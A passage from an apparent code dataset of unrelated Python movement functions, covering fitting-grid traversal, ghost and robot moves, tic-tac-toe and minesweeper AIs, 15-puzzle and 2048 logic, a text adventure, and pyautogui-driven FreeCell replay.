(b3==0) and redo: \n newx,newy = x3,y3\n back = True # moving backwards\n guessx,guessy,guesspar = x,y,par0\n else: \n back = False\n redo = False\n\n # Only P4 visited before\n #=======================\n elif (p3==0) and (p4==1): \n # Can this position be redone\n redo = gredo(x4,y4,x,y,par0)\n # P4 worse than P0, moving back\n #------------------------------\n if (b4==0) and redo: \n newx,newy = x4,y4\n back = True # moving backwards\n guessx,guessy,guesspar = x,y,par0\n else: \n back = False\n redo = False\n\n # Both visited before\n #====================\n elif (p3==1) and (p4==1): \n redo = False # not redo unless proven otherwise \n # Can these positions be redone\n redo3 = gredo(x3,y3,x,y,par0) \n redo4 = gredo(x4,y4,x,y,par0) \n\n # P3 worse than P0, but P4 better than P0 (or no gauss) (b3==0 and b4!=0)\n #----------------------------------------\n if (b3==0) and (b4!=0): \n # We can redo it, moving back to P3 \n if redo3:\n redo = True\n newx,newy = x3,y3\n # Can't redo, move forward \n else:\n redo = False\n back = False\n\n # P4 worse than P0, but P3 better than P0 (or no gauss) (b3!=0 and b4==0)\n #----------------------------------------\n elif (b3!=0) and (b4==0): \n # We can redo it, moving back to P4 \n if redo4:\n redo = True\n newx,newy = x4,y4\n # Can't redo, move forward \n else: \n redo = False\n back = False\n\n # Both P3 and P4 are worse than P0\n #---------------------------------\n elif (b3==0) and (b4==0): 
\n # Can redo either one, redo the one with the worse solution\n if redo3 and redo4:\n redo = True\n b34,dbic34 = gbetter(res3,res4)\n # Moving back to P3 (P3 worse than P4) \n if (b34==1): # to P3 \n newx,newy = x3,y3\n # Moving back to P4 (P4 worse than P3)\n if (b34==0): # to P4 \n newx,newy = x4,y4\n # Can't redo P4, go to P3 \n if redo3 and (redo4==False):\n redo = True\n newx,newy = x3,y3 # to P3\n # Can't redo P3, go to P4 \n if (redo3==False) and redo4:\n redo = True\n newx,newy = x4,y4 # to P4\n # Can't do either, move forward \n if (redo3==False) and (redo4==False): \n redo = False \n back = False\n\n # Both are better than P0 or both no Gaussians, move forward\n #-----------------------------------------------------------\n elif (b3!=0) and (b4!=0):\n back = False\n redo = False\n\n # Shouldn't ever happen\n else:\n import pdb; pdb.set_trace()\n \n # One is worse than P0\n #---------------------\n if redo: \n back = True # moving backwards \n guessx,guessy,guesspar = x,y,par0\n\n # Neither visited before, backwards not possible\n # p3==0 and p4==0\n else:\n back = False\n\n\n #==============================\n # ---- CHECKING FORWARD ----\n #==============================\n if ((p3==0) and (p4==0)) or (back==False) or noback: \n\n # This is the very end \n if (x1 is None) or (x==xr[1] and y==yr[1]):\n endflag = True\n return None,None,None,None,None,False,False,False,endflag\n\n back = False # moving forward \n\n # Only P1 has been visited before\n #================================\n if (p1==1) and (p2==0): \n redo = True\n # Can this position be redone\n redo1 = gredo(x1,y1,x,y,par0) \n # Moving to P1 (P1 worse than P0) \n if (b1==0) and redo1: \n newx,newy = x1,y1\n # Can't redo P1, or P1 better than P0, move another step ahead \n else: \n newx,newy = x1,y1\n redo = False\n skip = True # don't fit this one \n\n # Only P2 has been visited before, THIS SHOULD NEVER HAPPEN\n #================================ \n elif (p1==0) and (p2==1): \n print('This should never happen!!')\n import pdb; pdb.set_trace() \n\n # Both have been visited before\n #============================== \n elif (p1==1) and (p2==1):\n # Can this position be redone \n redo1 = gredo(x1,y1,x,y,par0) \n redo2 = gredo(x2,y2,x,y,par0) \n if (redo1==False) and (redo2==False): # no redo \n redo = False\n\n # P1 worse than P0, and P2 better than P0 (or no gauss) (b1==0 and b2!=0)\n #------------------------------------------------------\n if (b1==0) and (b2!=0): \n # Can redo, moving to P1 \n if redo1: \n newx,newy = x1,y1\n redo = True\n # Can't redo, increment to P1 and skip \n else: \n newx,newy = x1,y1 # to P1 \n redo = False\n skip = True\n\n # P2 worse than P0, and P1 better than P0 (or no gauss) (b1==1 and b2==0)\n #------------------------------------------------------\n elif (b1!=0) and (b2==0): \n # Can redo, moving to P2 \n if redo2: \n newx,newy = x2,y2\n redo = True\n # Can't redo, increment to P1 and skip \n else: \n newx,newy = x1,y1 # to P1 \n redo = False\n skip = True\n\n # Both worse than P0\n #-------------------\n elif (b1==0) and (b2==0): # both bad, find worst \n # Can redo either one, move to the one with the worse solution\n if redo1 and redo2:\n redo = True\n b12,dbic12 = gbetter(res1,res2)\n # Moving to P1 (P1 worse than P2) \n if (b12==1): # to P1 \n newx,newy = x1,y1\n # Moving to P2 (P2 worse than P1) \n if (b12==0): # to P2\n newx,newy = x2,y2\n\n # Can't redo P2, go to P1 \n if redo1 and (redo2==False):\n redo = True\n newx,newy = x1,y1 # to P1 \n # Can't redo P1, go to P2 \n if 
(redo1==False) and redo2:\n redo = True\n newx,newy = x2,y2 # to P2 \n # Can't do either, increment to P1 and skip \n if (redo1==False) and (redo2==False): \n newx,newy = x1,y1 # to P1 \n redo = False\n skip = True \n\n # Both better than P0 or both no Gaussians, increment to P1 and skip\n #-------------------------------------------------------------------\n elif (b1!=0) and (b2!=0):\n newx,newy = x1,y1 # to P1 \n redo = False\n skip = True \n\n # Shouldn't ever happen\n else:\n print('Should not happen 1')\n import pdb; pdb.set_trace()\n \n\n # Neither has been visited before, increment to P1\n #=================================================\n elif (p1==0) and (p2==0): \n # Increment to P1\n newx,newy = x1,y1\n\n # Should never happen\n else:\n print('Should not happen 2')\n import pdb; pdb.set_trace() \n \n\n # No new position determined yet, move forward to P1\n if newx is None or newy is None:\n # Increment to P1\n newx,newy = x1,y1\n\n # Getting guess\n if newx is not None and newy is not None and guesspar is None:\n guesspar,guessx,guessy = gguess(newx,newy,xr,yr,xsgn,ysgn)\n \n try:\n dumx,dumy = newx,newy\n except:\n print('problem')\n import pdb; pdb.set_trace()\n\n \n return newx,newy,guessx,guessy,guesspar,back,redo,skip,endflag", "def execute_move(self, game_state):\n # Set new location based on which ghost this is\n game_state.ghosts_pos[self.ghost_id] = self.next_move", "def execute_move(self, game_state):\n # Set new location based on which ghost this is\n game_state.ghosts_pos[self.ghost_id] = self.next_move", "def move(self, usercmd):\n newPosX = self.robot.posX\n newPosY = self.robot.posY\n logging.info(\"Avant action :: newPosX={} / newPosY={}\".\\\n format(newPosX, newPosY))\n step = 1\n cmd = usercmd[0:1]\n if (len(usercmd) != 1):\n stpStr = usercmd[1:]\n if (stpStr.isdigit()):\n step = int(stpStr)\n else:\n step = 0\n if cmd.startswith(\"E\"):\n newPosX = newPosX + step\n elif cmd.startswith(\"W\"):\n newPosX = newPosX - step\n elif cmd.startswith(\"N\"):\n newPosY = newPosY - step\n elif cmd.startswith(\"S\"):\n newPosY = newPosY + step\n elif (cmd == \"Q\"):\n #quit\n print(\"Quit\")\n return False\n logging.info(\"newPosX={} / newPosY={}\".format(newPosX, newPosY))\n oldCar = \"\"\n newCar = \"\"\n if (self.canMove(cmd, self.robot, newPosX, newPosY)):\n oldCar = self.map[newPosY][newPosX]\n logging.info(\"originalMap[{}] : {}\".format(self.robot.posY, \\\n self.originalMap[self.robot.posY]))\n if (self.originalMap[self.robot.posY][self.robot.posX] == \".\"):\n self.map[self.robot.posY][self.robot.posX] = \".\"\n else:\n self.map[self.robot.posY][self.robot.posX] = \" \"\n self.robot.posX = newPosX\n self.robot.posY = newPosY\n self.map[newPosY][newPosX] = \"X\"\n logging.info(\"self.map[{}]={}\".format(newPosY, self.map[newPosY]))\n newCar = self.map[newPosY][newPosX]\n #print(oldCar, newCar)\n if (oldCar == \"U\" and newCar == \"X\"):\n print(\"Bravo, vous avez gagné !!!!!\")\n #Quit\n return False\n return True", "def move(self, row: int, col: int, player: int):\n def addup(dict_name, invalid_set, another_invalid, locx, locy):\n if locx == locy:\n diag_name = (1,1)\n if diag_name not in invalid_set:\n dict_name[diag_name] += 1\n if dict_name[diag_name] == self.tar:\n return player\n another_invalid.add(diag_name)\n if locx == self.tar-1-locy:\n diag_name = (-1, -1)\n if diag_name not in invalid_set:\n dict_name[diag_name] += 1\n if dict_name[diag_name] == self.tar:\n return player\n another_invalid.add(diag_name)\n curcol = (locy, None)\n currow = (None, 
locx)\n if curcol not in invalid_set:\n dict_name[curcol] += 1\n if dict_name[curcol] == self.tar:\n return player\n another_invalid.add(curcol)\n if currow not in invalid_set:\n dict_name[currow] += 1\n if dict_name[currow] == self.tar:\n return player\n another_invalid.add(currow)\n return 0\n res = 0\n if (row, col) not in self.walked:\n if player == 1:\n res = addup(self.p1, self.invalid_1, self.invalid_2, row, col)\n if player == 2:\n res = addup(self.p2, self.invalid_2, self.invalid_1, row, col)\n self.walked.add((row, col))\n return res", "def move_invalid():\n check50.run(run_command).stdin(\"EAST\").stdout(\"Invalid command.\")", "def make_move(self):\n\n # get relavent information\n affinity = self.get_affinity()\n sample_space = self.get_game_space()\n depth_limit = self.__search_depth\n\n # run a minimax search and get the best value\n bestval = MinimaxTree.minimax(self, sample_space, affinity, depth_limit, True)\n if bestval[0] is None: bestval = ((0,6),'x', 0)\n\n # print the number of nodes expanded \n print(self.nodes_expanded)\n\n # make the move found by the search \n self.get_game_space().set_tile(bestval[0][0], bestval[0][1], affinity)", "def move(self, direction):\n command = self.DIRECTIONS[direction][\"command\"]\n mem, out = self.cpu.run_program(inputs=[command])\n status = out.pop()\n if status in (1, 2):\n self.position = Point(\n self.position.x + self.DIRECTIONS[direction][\"mask\"][0],\n self.position.y + self.DIRECTIONS[direction][\"mask\"][1]\n )\n if self.display:\n self.draw_grid()\n sleep(self.delay)\n return status", "def move(self, rel_pos):\n self.pos = (self.pos[0] + rel_pos[0] * GRID, self.pos[1] + rel_pos[1] * GRID)", "def Recharge_Method2(r, c):\n if state.loc[r] != state.pos[c] and state.pos[c] != r:\n if state.pos[c] in rv.LOCATIONS:\n alg.do_task('moveTo', r, state.pos[c])\n else:\n robot = state.pos[c]\n alg.do_command(put, robot, c)\n alg.do_task('moveTo', r, state.pos[c])\n alg.do_command(charge, r, c)", "def solve_row0_tile(self, target_col):\r\n # replace with your code\r\n assert self.row0_invariant(target_col), 'Some trouble in row0_invariant' \r\n whole_move = ''\r\n #current_position = self.current_position(0, target_col)\r\n current_row, current_col = self.current_position(0, target_col)\r\n # print self.get_number(current_row, current_col)\r\n zero_row, zero_col = 0, target_col\r\n # print 'Target tile position=',self.current_position(0, target_col)\r\n # print 'Target tile value=', self._grid[current_position[0]][current_position[1]]\r\n # print '0 position=', (0, target_col)\r\n # print '------------------------------------------'\r\n # print 'Recommended move ld'\r\n \r\n recomended_move = 'ld'\r\n whole_move += recomended_move\r\n zero_col -= len(filter(lambda x: x=='l', recomended_move))\r\n zero_row += len(filter(lambda x: x=='d', recomended_move))\r\n self.update_puzzle(recomended_move)\r\n # print 'Grid after move:', recomended_move\r\n # print self\r\n # print 'Updated Target tile position=',self.current_position(0, target_col)\r\n # print 'Updated 0 position=', (zero_row, zero_col)\r\n # print 'Target position =', (0, target_col)\r\n #####Case when we check if recomended move solves the tile\r\n if self.current_position(0, target_col) == (0, target_col):\r\n # print 'Congrads recomended move made great deal !!'\r\n return whole_move\r\n #####If not, we position TT to (1, target_col-1),\r\n ##### and ZEOR to (1, target_col-2)\r\n else:\r\n # print '------------------------------'\r\n # print 'After base move we are do not 
finde puzzle'\r\n # print 'Lets move zero towards TT'\r\n \r\n ######Moving zero tile to the target tile\r\n path_up = (zero_row - current_row) * 'u'\r\n path_side = (zero_col - current_col) * 'l'\r\n path_for_zero = path_up + path_side\r\n whole_move += path_for_zero\r\n zero_col -= len(filter(lambda x: x=='l', path_for_zero))\r\n zero_row -= len(filter(lambda x: x=='u', path_for_zero))\r\n self.update_puzzle(path_for_zero)\r\n \r\n # print 'grid after move', path_for_zero\r\n # print self\r\n # print 'Updated Target tile position=',self.current_position(0, target_col)\r\n # print 'Updated 0 position=', (zero_row, zero_col)\r\n # print 'Target position =', (0, target_col)\r\n counter = 0\r\n # print self.current_position(0, target_col) != (1, target_col-1)\r\n # print (zero_row,zero_col) != (1,target_col-2)\r\n ####POitioning TT and zero into positions that can be solvable\r\n while self.current_position(0, target_col) != (1, target_col-1) or \\\r\n (zero_row,zero_col) != (1,target_col-2):\r\n counter +=1\r\n #current_position = self.current_position(0, target_col)\r\n current_row, current_col = self.current_position(0, target_col)\r\n cyclic_moves = ''\r\n # print 'Aloha in the loop'\r\n if zero_col < current_col:\r\n # print 'ZERO tile located in the left side and down move IS NOT POSIBLE'\r\n \r\n\r\n if current_col != target_col-1 and zero_row == 0:\r\n # print 'In the upper row and we can use down cycling'\r\n cyclic_moves = 'drrul'\r\n whole_move += cyclic_moves\r\n zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n zero_row += len(filter(lambda x: x=='d', cyclic_moves))\r\n zero_row -= len(filter(lambda x: x=='u', cyclic_moves))\r\n\r\n elif current_col != target_col-1:\r\n # print 'not under the target place'\r\n cyclic_moves = 'urrdl'\r\n whole_move += cyclic_moves\r\n zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n zero_row += len(filter(lambda x: x=='d', cyclic_moves))\r\n zero_row -= len(filter(lambda x: x=='u', cyclic_moves))\r\n elif current_col == target_col-1:\r\n # print 'Target tile under target place'\r\n # print 'DEBUG!!!!'\r\n # print self\r\n # print zero_col, target_col\r\n if zero_col == 0 and current_col == 1:\r\n cyclic_moves = 'druld'\r\n elif zero_row == 0:\r\n cyclic_moves = 'druld'\r\n \r\n else:\r\n cyclic_moves = 'urd'\r\n whole_move += cyclic_moves\r\n zero_row += len(filter(lambda x: x=='d', cyclic_moves))\r\n zero_row -= len(filter(lambda x: x=='u', cyclic_moves))\r\n zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n elif zero_row > current_row:\r\n # print 'DEBUG'\r\n # print 'TT under zero tile'\r\n cyclic_moves = 'uld'\r\n whole_move += cyclic_moves\r\n zero_row += len(filter(lambda x: x=='d', cyclic_moves))\r\n zero_row -= len(filter(lambda x: x=='u', cyclic_moves))\r\n zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n # print 'Puzzle after Maded move:', cyclic_moves\r\n self.update_puzzle(cyclic_moves)\r\n # print 'Zero at home=', 'Zero col', zero_col, '== Target col - 1 is', target_col - 1\r\n # print self\r\n # print 'Loop counter =',counter\r\n \r\n if counter > 10:\r\n # print 'COUNTER break'\r\n break\r\n\r\n #####Solving using pattern 2 x 3 puzzle\r\n # print '--------------------------'\r\n # print 'Lets solve 2x3 puzzle formed recently'\r\n move2x3 = \"urdlurrdluldrruld\"\r\n whole_move += move2x3\r\n zero_col -= 
len(filter(lambda x: x=='l', move2x3))\r\n zero_col += len(filter(lambda x: x=='r', move2x3))\r\n zero_row += len(filter(lambda x: x=='d', move2x3))\r\n zero_row -= len(filter(lambda x: x=='u', move2x3))\r\n self.update_puzzle(move2x3)\r\n # print self\r\n assert self.row1_invariant(target_col-1), 'Some trouble in row1_invariant' \r\n return whole_move", "def move(self, board, player_mark='o'):\n # First things first, let's check if the board is full first before we\n # make a move\n full = 1\n for location in board.keys():\n if board[location] == '-':\n full = 0\n\n if not full:\n # Storm Spirit is a dumb yet aggressive AI, so he does not need to\n # check whether the opponent has created a line.\n\n # Initialize a move variable that determines the location that the\n # AI will mark.\n move = ''\n\n # Let's see if there are any potential lines that we can form,\n # then mark the location that would finish that line.\n print('Searching for potential lines...')\n move = self.find_line_attempt(board, 'x')\n\n if(move == ''):\n print('No potential lines found. Marking random location.')\n # Initialize a boolean variable that tracks whether we have\n # marked a location or not.\n marked = 0\n while not marked:\n location = random.randint(1,9)\n\n # The location will have to be empty\n if(location == 1 and board['topleft'] == '-'):\n marked = 1\n print('Marking topleft location\\n')\n elif(location == 2 and board['topcenter'] == '-'):\n marked = 1\n print('Marking topcenter location\\n')\n elif(location == 3 and board['topright'] == '-'):\n marked = 1\n print('Marking topright location\\n')\n elif(location == 4 and board['middleleft'] == '-'):\n marked = 1\n print('Marking middleleft location\\n')\n elif(location == 5 and board['middlecenter'] == '-'):\n marked = 1\n print('Marking middlecenter location\\n')\n elif(location == 6 and board['middleright'] == '-'):\n marked = 1\n print('Marking middleright location\\n')\n elif(location == 7 and board['bottomleft'] == '-'):\n marked = 1\n print('Marking bottomleft location\\n')\n elif(location == 8 and board['bottomcenter'] == '-'):\n marked = 1\n print('Marking bottomcenter location\\n')\n elif(location == 9 and board['bottomright'] == '-'):\n marked = 1\n print('Marking bottomright location\\n')\n else:\n # There are no more locations to mark, but set marked to\n # true anyway\n print('No empty spaces found! 
Re-rolling')\n # Mark the location chosen\n if(location == 1):\n board['topleft'] = self.mark\n elif(location == 2):\n board['topcenter'] = self.mark\n elif(location == 3):\n board['topright'] = self.mark\n elif(location == 4):\n board['middleleft'] = self.mark\n elif(location == 5):\n board['middlecenter'] = self.mark\n elif(location == 6):\n board['middleright'] = self.mark\n elif(location == 7):\n board['bottomleft'] = self.mark\n elif(location == 8):\n board['bottomcenter'] = self.mark\n elif(location == 9):\n board['bottomright'] = self.mark\n else:\n # We found a line attempt, let's mark the finishing location\n board[move] = self.mark\n print('Marked location at ' + move)", "def move(x, y, direction, board):\n\n piece_at_xy = starter.get_piece(x, y, board); # Getting necessary pieces\n\n assert piece_at_xy != '*', \"Error in swipe logic\"; # Logical debug case\n valid_direction = (direction == \"left\" or\n direction == \"right\" or\n direction == \"up\" or\n direction == \"down\");\n assert valid_direction, \"Invalid direction passed in\"; # Logical debug case\n\n # The new x and y for the current piece (adjacent's current position) are stored alongside adjacent (fewer ifs + redundant code)\n if direction == \"left\":\n adjacent = (starter.get_piece(x - 1, y, board), x - 1, y);\n elif direction == \"right\":\n adjacent = (starter.get_piece(x + 1, y, board), x + 1, y);\n elif direction == \"up\":\n adjacent = (starter.get_piece(x, y - 1, board), x, y - 1);\n elif direction == \"down\":\n adjacent = (starter.get_piece(x, y + 1, board), x, y + 1);\n\n if adjacent[0] == None: # Edge of the board case (no action taken)\n return False;\n\n elif piece_at_xy != adjacent[0] and adjacent[0] != '*': # Can't combine two numbers case (no action taken)\n return False;\n\n elif adjacent[0] == '*': # Empty spot adjacent case (recursive movement in direction)\n starter.place_piece('*', x, y, board);\n starter.place_piece(piece_at_xy, adjacent[1], adjacent[2], board);\n move(adjacent[1], adjacent[2], direction, board);\n return True;\n\n elif piece_at_xy == adjacent[0]: # Adjacent same numbers case (combine them)\n starter.place_piece('*', x, y, board);\n starter.place_piece(str(int(adjacent[0]) * 2), adjacent[1], adjacent[2], board);\n move(adjacent[1], adjacent[2], direction, board);\n return True;\n\n else:\n # Logical debug case\n assert False, \"No way you should be in here. 
Error in move logic\";\n\n return False;", "def move(argument, player):\n current_tile = world.tile_exists(player.location_x, player.location_y)\n if argument == \"north\":\n if world.tile_exists(player.location_x, player.location_y-1):\n new_tile = world.tile_exists(player.location_x, player.location_y-1)\n if new_tile.__class__.__name__ in current_tile.connected: # Making sure prospective tile is connected\n if new_tile.can_enter: # Making sure prospective tile is enter-able\n player.move(player.location_x, player.location_y-1)\n else:\n print(new_tile.name + \" is locked.\")\n else:\n print(\"You can't do that.\")\n else:\n print(\"You can't do that.\")\n elif argument == \"south\":\n if world.tile_exists(player.location_x, player.location_y+1):\n new_tile = world.tile_exists(player.location_x, player.location_y+1)\n if new_tile.__class__.__name__ in current_tile.connected: # Making sure prospective tile is connected\n if new_tile.can_enter: # Making sure prospective tile is enter-able\n player.move(player.location_x, player.location_y+1)\n else:\n print(new_tile.name + \" is locked.\")\n else:\n print(\"You can't do that.\")\n else:\n print(\"You can't do that.\")\n elif argument == \"east\":\n if world.tile_exists(player.location_x+1, player.location_y):\n new_tile = world.tile_exists(player.location_x + 1, player.location_y)\n if new_tile.__class__.__name__ in current_tile.connected: # Making sure prospective tile is connected\n if new_tile.can_enter: # Making sure prospective tile is enter-able\n player.move(player.location_x+1, player.location_y)\n else:\n print(new_tile.name + \" is locked.\")\n else:\n print(\"You can't do that.\")\n else:\n print(\"You can't do that.\")\n elif argument == \"west\":\n if world.tile_exists(player.location_x-1, player.location_y):\n new_tile = world.tile_exists(player.location_x-1, player.location_y)\n if new_tile.__class__.__name__ in current_tile.connected: # Making sure prospective tile is connected\n if new_tile.can_enter: # Making sure prospective tile is enter-able\n player.move(player.location_x-1, player.location_y)\n else:\n print(new_tile.name + \" is locked.\")\n else:\n print(\"You can't do that.\")\n else:\n print(\"You can't do that.\")\n else:\n print(\"Movement not recognized. 
Specify a cardinal direction.\")\n return", "def make_move(self): \n if self.counter == 0:\n #AI makes a random move to start\n ai_move = random.randrange(0,((self.size[0] * self.size[1]) - 1)) \n \n #Number to coordinate conversion\n row = ai_move % self.size[0]\n column = ai_move % self.size[0]\n self.start_game((row, column))\n self.counter = 1\n\n if (self.board[(row, column)] == 'm'):\n #print() \"\\n\", \"First move RIP!, what are the odds...\"\n self.found_mine()\n self.gameover = 1\n \n else:\n row, column = self.find_move()\n \n #0.25 second wait \n #time.sleep(0.25)\n\n #Prints out to the terminal the move and type of move\n print(row, \",\", column)\n\n #Updates the GUI\n root.update()\n \n if (self.board[(row, column)] == 'm'):\n print(\"RIP!\") \n self.found_mine() \n self.gameover = 1\n \n elif self.board[(row, column)] == '0':\n print(\"No mines in sight\") \n self.found_space((row, column))\n\n elif self.board[(row, column)] == '1':\n print(\"There is 1 mine next to this spot\") \n self.found_border((row, column))\n else:\n print(\"There are\", self.board[(row, column)], \"mines next to this spot\") \n self.found_border((row, column))", "def solve_row1_tile(self, target_col):\r\n # replace with your code\r\n whole_move = ''\r\n if self._grid[1][target_col] != 0:\r\n # print \"DEBUG CASE WHEN ZERO IN JOPA solve_row1_tile \"\r\n \r\n # print self\r\n # print 'Solwing tile', self._grid[1][target_col]\r\n \r\n # print 'Searchind indexes of ZERO'\r\n for row in self._grid:\r\n for col in row:\r\n if col == 0:\r\n zero_row, zero_col = self._grid.index(row), row.index(col)\r\n break\r\n # print 'ZERO indexes=', (zero_row, zero_col)\r\n #####Moving zero to correct place\r\n #path_down = (1 - zero_row) * 'd'\r\n # path_left = (zero_col - target_col) * 'l'\r\n if target_col - zero_col > 0:\r\n #path_right = (target_col - zero_col) * 'r'\r\n path_of_zero = (1 - zero_row) * 'd' + (target_col - zero_col) * 'r'\r\n else:\r\n path_of_zero = (1 - zero_row) * 'd'\r\n #zero_col -= len(filter(lambda x: x=='l', path_of_zero))\r\n #zero_row -= len(filter(lambda x: x=='u', path_of_zero))\r\n zero_col += len(filter(lambda x: x=='r', path_of_zero))\r\n zero_row += len(filter(lambda x: x=='d', path_of_zero))\r\n self.update_puzzle(path_of_zero)\r\n # print 'Grid after moving ZERO to target spot'\r\n # print self\r\n whole_move += path_of_zero\r\n\r\n assert self.row1_invariant(target_col), 'Some trouble in row1_invariant' \r\n \r\n #current_row, current_col = self.current_position(1, target_col)\r\n zero_row, zero_col = 1, target_col\r\n ######Moving zero tile to the target tile\r\n #path_up = (zero_row - current_row) * 'u'\r\n #path_side = (zero_col - current_col) * 'l'\r\n path_for_zero = (zero_row - self.current_position(1, target_col)[0]) * 'u' + (zero_col - self.current_position(1, target_col)[1]) * 'l'\r\n whole_move += path_for_zero\r\n zero_col -= len(filter(lambda x: x=='l', path_for_zero))\r\n zero_row -= len(filter(lambda x: x=='u', path_for_zero))\r\n self.update_puzzle(path_for_zero)\r\n # print 'grid after move', path_for_zero\r\n # print self\r\n # print 'Updated Target tile position=',self.current_position(1, target_col)\r\n # print 'Updated 0 position=', (zero_row, zero_col)\r\n # print 'Target position =', (1, target_col)\r\n counter = 0\r\n while self.current_position(1, target_col) != \\\r\n (1, target_col) or (zero_row, zero_col) != (0, target_col):\r\n # print 'Welcome to while loop!'\r\n cyclic_moves = ''\r\n #### Case 3 if ZERO located in the left side of the target tile\r\n 
### like in the owel-test case\r\n #current_position = self.current_position(1, target_col)\r\n current_col = self.current_position(1, target_col)[1]\r\n counter +=1\r\n if self.current_position(1, target_col) == \\\r\n (1, target_col):\r\n # print 'ZERO not under TT'\r\n cyclic_moves = 'ur'\r\n whole_move += cyclic_moves\r\n zero_row -= len(filter(lambda x: x=='u', cyclic_moves))\r\n zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n elif zero_col < current_col and self._grid[zero_row+1][zero_col] < \\\r\n self._grid[self.current_position(1, target_col)[0]][self.current_position(1, target_col)[1]]:\r\n # print 'ZERO tile located in the left side and down move is POSIBLE'\r\n if current_col != target_col:\r\n # print 'not under the target place'\r\n cyclic_moves = 'drrul'\r\n whole_move += cyclic_moves\r\n zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n zero_row += len(filter(lambda x: x=='d', cyclic_moves))\r\n zero_row -= len(filter(lambda x: x=='u', cyclic_moves))\r\n elif current_col == target_col:\r\n # print 'Target tile under target place'\r\n cyclic_moves = 'dru'\r\n whole_move += cyclic_moves\r\n zero_row += len(filter(lambda x: x=='d', cyclic_moves))\r\n zero_row -= len(filter(lambda x: x=='u', cyclic_moves))\r\n zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n elif current_col != target_col and self._grid[zero_row+1][zero_col] > \\\r\n self._grid[self.current_position(1, target_col)[0]][self.current_position(1, target_col)[1]]:\r\n # print 'not under the target place'\r\n cyclic_moves = 'urrdl'\r\n whole_move += cyclic_moves\r\n zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n zero_row += len(filter(lambda x: x=='d', cyclic_moves))\r\n zero_row -= len(filter(lambda x: x=='u', cyclic_moves)) \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n # elif zero_col < current_col and self._grid[zero_row+1][zero_col] > \\\r\n # self._grid[current_position[0]][current_position[1]]:\r\n # # print 'ZERO tile located in the left side and down move IS NOT POSIBLE'\r\n # if current_col != target_col:\r\n # # print 'not under the target place'\r\n # cyclic_moves = 'urrdl'\r\n # whole_move += cyclic_moves\r\n # zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n # zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n # zero_row += len(filter(lambda x: x=='d', cyclic_moves))\r\n # zero_row -= len(filter(lambda x: x=='u', cyclic_moves))\r\n # elif current_col == target_col:\r\n # # print 'Target tile under target place'\r\n # cyclic_moves = 'urd'\r\n # whole_move += cyclic_moves\r\n # zero_row += len(filter(lambda x: x=='d', cyclic_moves))\r\n # zero_row -= len(filter(lambda x: x=='u', cyclic_moves))\r\n # zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n\r\n #cyclic_moves +='ur'\r\n # print 'Puzzle after Maded move:', cyclic_moves\r\n self.update_puzzle(cyclic_moves)\r\n # print 'Zero at home=', 'Zero col', zero_col, '== Target col - 1 is', target_col - 1\r\n # print self\r\n # print 'Loop counter =',counter\r\n if counter > 10:\r\n break\r\n return whole_move", "def execute_solution(offset_x, offset_y, moves):\n\n\t# Offsets for approximately where everything is given 1600x900 game window size\n\tbase_x = 46\n\tbase_y = 238\n\tfreecell_x = 314\n\tfreecell_y = 24\n\twidth = 128\n\theight = 30\n\tmodifier_x = 40\n\tmodifier_y = 19\n\n\t# Correct for retina display (change to 1 on conventional monitor)\n\tres_scale = 
0.5\n\n\t# First, click the window\n\tpyautogui.mouseDown((offset_x + 100) * res_scale, (offset_y + 100) * res_scale, button=\"left\")\n\ttime.sleep(0.5)\n\tpyautogui.mouseUp()\n\ttime.sleep(1)\n\n\t# Now, replay the moves one by one\n\tfor move in moves:\n\t\t# which stack, how many cards down -> which stack, how many cards down\n\t\tx_pre, y_pre, x_post, y_post = move\n\n\t\t# If it's a regular stack, move to the offset\n\t\tif x_pre < 8:\n\t\t\tx_pre_final = offset_x + base_x + (width * x_pre) + modifier_x\n\t\t\ty_pre_final = offset_y + base_y + (height * y_pre) + modifier_y\n\t\t# Separate offsets for freecell\n\t\telse:\n\t\t\tx_pre_final = offset_x + freecell_x + (width * (x_pre - 8)) + modifier_x\n\t\t\ty_pre_final = offset_y + freecell_y + modifier_y\n\n\t\tif x_post < 8:\n\t\t\tx_post_final = offset_x + base_x + (width * x_post) + modifier_x\n\t\t\ty_post_final = offset_y + base_y + (height * y_post) + modifier_y\n\t\telse:\n\t\t\tx_post_final = offset_x + freecell_x + (width * (x_post - 8)) + modifier_x\n\t\t\ty_post_final = offset_y + freecell_y + modifier_y\n\n\t\tprint(\"Mouse to %d, %d -> drag to %d, %d\" % (x_pre_final, y_pre_final, x_post_final, y_post_final))\n\n\t\t# Move the mouse to the beginning place\n\t\tpyautogui.moveTo(x_pre_final * res_scale, y_pre_final * res_scale, duration = 0.25)\n\n\t\t# Click and drag to the end\n\t\tpyautogui.dragTo(x_post_final * res_scale, y_post_final * res_scale, duration = 0.25, button = \"left\")\n\n\t\t# Wait for a while\n\t\ttime.sleep(0.25)", "def moveToNext(self):\n\t\tif self.G.debug:\n\t\t\ttic=time.clock()\n\t\tself.debugPrint('looks for new spot')\n\t\texceeds=self.m.exceedsAngleLim\t#function\n\t\tinside=self.m.isWithinPlantingBorders\t#function\n\t\tcart=self.m.getCartesian\n\t\tauto=self.m.automatic\n\t\tt=self.m.times\n\t\tcommands=[]\n\t\tif self.autoMoved:\n\t\t\topt=self.pos\n\t\t\tself.autoMoved=False #if this search is unsuccessfull, automove is enabled to next ideal pos.\n\t\telse:\n\t\t\topt=self.getNextOptimal()\n\t\tmoveTo=opt #for so long..\n\t\trTemp=0.1\n\t\tthTemp=0\n\t\tb=0.05 #constant for the spiral\n\t\ta=0.1\n\t\tplant=True #we will plant in this step...\n\t\td2=self.m.plantMinDist**2 #dist^2\n\t\tpossible = False #for so long\n\t\twhile not 